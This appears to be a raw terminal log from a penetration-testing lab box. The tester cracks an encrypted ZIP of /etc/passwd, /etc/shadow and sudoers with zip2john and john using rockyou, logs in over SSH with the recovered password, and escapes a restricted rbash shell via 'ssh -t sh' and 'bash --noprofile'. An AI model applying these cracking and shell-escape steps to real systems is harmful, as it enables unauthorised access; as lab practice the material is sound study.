


â”Śâ”€â”€(rootă‰żkali)-[/home/kali]
â””â”€# zip2john save.zip > hash                   
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE ts=90AB cs=90ab type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: TS_chk, cmplen=434, decmplen=1111, crc=E11EC139 ts=834F cs=834f type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: TS_chk, cmplen=460, decmplen=829, crc=A1F81C08 ts=8D07 cs=8d07 type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: TS_chk, cmplen=368, decmplen=669, crc=FF05389F ts=1535 cs=1535 type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: TS_chk, cmplen=140, decmplen=185, crc=DFB905CD ts=8759 cs=8759 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** save.zip/etc/hostname PKZIP Encr: TS_chk, cmplen=45, decmplen=33, crc=D9C379A9 ts=8CE8 cs=8ce8 type=0
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
                                                                                                                     
â”Śâ”€â”€(rootă‰żkali)-[/home/kali]
â””â”€# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manuel           (save.zip)     
1g 0:00:00:00 DONE (2025-10-12 08:51) 50.00g/s 409600p/s 409600c/s 409600C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                     
â”Śâ”€â”€(rootă‰żkali)-[/home/kali]
â””â”€# 



we are supposed to have a hash in the shadow file, but we do not. 


â”Śâ”€â”€(rootă‰żkali)-[/home/kali]
â””â”€# ssh 296640a3b825115a47b68fc44501c828@192.168.206.85

296640a3b825115a47b68fc44501c828@192.168.206.85's password: 
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
-rbash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -lsa
total 56
 4 drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  4096 Aug 27  2020 .
 4 drwxr-xr-x 3 root                             root                              4096 Jun 27  2020 ..
 0 lrwxrwxrwx 1 root                             root                                 9 Jul  7  2020 .bash_history -> /dev/null
 4 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828   220 Jun 27  2020 .bash_logout
 4 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  3583 Jun 27  2020 .bashrc
20 -rwxr-xr-x 1 root                             root                             17480 Jul  7  2020 honeypot.decoy
 4 -rw------- 1 root                             root                              1855 Jul  7  2020 honeypot.decoy.cpp
 0 lrwxrwxrwx 1 root                             root                                 7 Jun 27  2020 id -> /bin/id
 0 lrwxrwxrwx 1 root                             root                                13 Jun 27  2020 ifconfig -> /bin/ifconfig
 4 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    33 Oct 12 08:49 local.txt
 0 lrwxrwxrwx 1 root                             root                                 7 Jun 27  2020 ls -> /bin/ls
 0 lrwxrwxrwx 1 root                             root                                10 Jun 27  2020 mkdir -> /bin/mkdir
 4 -rwxr-xr-x 1 root                             root                               807 Jun 27  2020 .profile
 4 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    66 Jun 27  2020 .selected_editor
 4 -rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    32 Aug 27  2020 user.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat user.txt
-rbash: cat: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ 


3 ways to break out of rbash with -t pseudo-terminal

â”Śâ”€â”€(rootă‰żkali)-[/home/kali]
â””â”€# ssh 296640a3b825115a47b68fc44501c828@192.168.206.85 -t /bin/sh
296640a3b825115a47b68fc44501c828@192.168.206.85's password: 
rbash: /bin/sh: restricted: cannot specify `/' in command names
Connection to 192.168.206.85 closed.
                                                                                                                     
â”Śâ”€â”€(rootă‰żkali)-[/home/kali]
â””â”€# ssh 296640a3b825115a47b68fc44501c828@192.168.206.85 -t sh     
296640a3b825115a47b68fc44501c828@192.168.206.85's password: 
$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)


â”Śâ”€â”€(rootă‰żkali)-[/home/kali]
â””â”€# ssh 296640a3b825115a47b68fc44501c828@192.168.206.85 -t "bash --noprofile" 
296640a3b825115a47b68fc44501c828@192.168.206.85's password: 
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)













